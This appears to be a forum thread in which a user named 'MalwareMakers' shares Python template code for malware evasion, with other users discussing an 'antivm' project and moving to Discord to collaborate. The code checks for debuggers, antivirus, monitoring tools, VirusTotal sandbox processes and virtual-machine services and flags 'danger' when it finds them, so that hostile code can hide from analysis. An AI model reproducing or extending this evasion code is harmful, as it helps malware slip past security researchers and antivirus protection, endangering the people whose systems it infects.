Just some extras

[MalwareMakers]

def {self.error_name}(self): 
        try: 
            import key
        except ImportError as e:
            print(f"No module: {{str(e)}}")

    def {self.check_os_name}(self): 
        os_name = platform.system()
        if os_name != 'Windows':
            return "danger"
        return "safe"

    def {self.pid_hunt_name}(self):
        def check_process(process_name):
            for process in psutil.process_iter(attrs=['name']):
                if process.info['name'] == process_name:
                    return True
            return False

        processes_to_check = [
            {{'pid': 1616, 'name': 'sysmon.exe'}},
            {{'pid': 2400, 'name': 'frida-winjector-helper-32.exe'}},
            {{'pid': 2464, 'name': 'frida-winjector-helper-64.exe'}},
            {{'pid': 1272, 'name': 'wspsvc.exe'}},
            {{'pid': 664, 'name': 'stigthymwmxu.exe'}},
            {{'pid': 2772, 'name': 'drjzmo.exe'}},
            {{'pid': 1904, 'name': 'avp.exe'}},
            {{'pid': 4000, 'name': 'avpui.exe'}},
            {{'pid': 4188, 'name': 'jhoslg.exe'}},
            {{'name': 'procmon.exe'}},
            {{'name': 'Vsserv.exe'}},
            {{'name': 'Postman.exe'}},
            {{'name': 'ollydbg.exe'}},
            {{'name': 'ProcessHacker.exe'}},
            {{'name': 'tcpview.exe'}},
            {{'name': 'regmon.exe'}},
            {{'name': 'procep.exe'}},
            {{'name': 'idaq.exe'}},
            {{'name': 'idaq64.exe'}},
            {{'name': 'ImmunityDebugger.exe'}},
            {{'name': 'Wireshark.exe'}},
            {{'name': 'dumpcap.exe'}},
            {'name': 'HookExplorer.exe'},
            {{'name': 'ImportREC.exe'}},
            {{'name': 'PETools.exe'}},
            {{'name': 'LordPE.exe'}},
            {{'name': 'SysInspector.exe'}}, 
            {{'name': 'proc_analyzer.exe'}},
            {{'name': 'sysAnalyzer.exe'}},
            {{'name': 'sniff_hit.exe'}},
            {{'name': 'windbg.exe'}},
            {{'name': 'joeboxcontrol.exe'}},
            {{'name': 'joeboxserver.exe'}},
            {{'name': 'ResourceHacker.exe'}},
            {'name': 'x32dbg.exe'},
            {{'name': 'x64dbg.exe'}},
            {{'name': 'Fiddler.exe'}},
            {{'name': 'httpdebugger.exe'}},
            {{'name': 'Sysmon64.exe'}},
            {{'name': 'nioswk.exe'}},
            {{'name': 'EDhVfFCHsBIIflrGw.exe'}},
            {{'name': 'lujazdkmiseqp.exe'}},
            {{'name': 'VmRemoteGuest.exe'}},
            {{'name': 'VirtualBoxVM.exe'}},
            {{'name': 'VBoxSVC.exe'}},
        ]
        for process_info in processes_to_check:
            process_name = process_info['name']

            if check_process(process_name):
                return "danger"   
        return "safe"

    def{self.Sandbox_name}(self):
        EvidenceOfSandbox = []
        sandboxProcesses = "vmsrvc", "tcpview", "wireshark", "visual basic", "fiddler", "vmware", "vbox", "process explorer", "autoit", "vboxtray", "vmtools", "vmrawdsk", "vmusbmouse", "vmvss", "vmscsi", "vmxnet", "vmx_svga", "vmmemctl", "df5serv", "vboxservice", "vmhgfs"
        _, runningProcesses = win32pdh.EnumObjectItems(None,None,'process', win32pdh.PERF_DETAIL_WIZARD)
        for process in runningProcesses:
            for sandboxProcess in sandboxProcesses:
                if sandboxProcess in str(process):
                    if process not in EvidenceOfSandbox:
                        EvidenceOfSandbox.append(process)
                        break
        return EvidenceOfSandbox

[Antsbatscats]

the weird names are processes from within vt right?

[MalwareMakers]

the weird names are processes from within vt yea they are

[gumbobrot]

im already working on a special antivm that includes this, but still thanks, i'll see if i can implement it

[MalwareMakers]

im already working on a special antivm that includes this, but still thanks, i'll see if i can implement it

ye alr, im currently developing my own system want to work together?.

[gumbobrot]

send link or dm me on discord .gumbobrot#0

[MalwareMakers]

sent req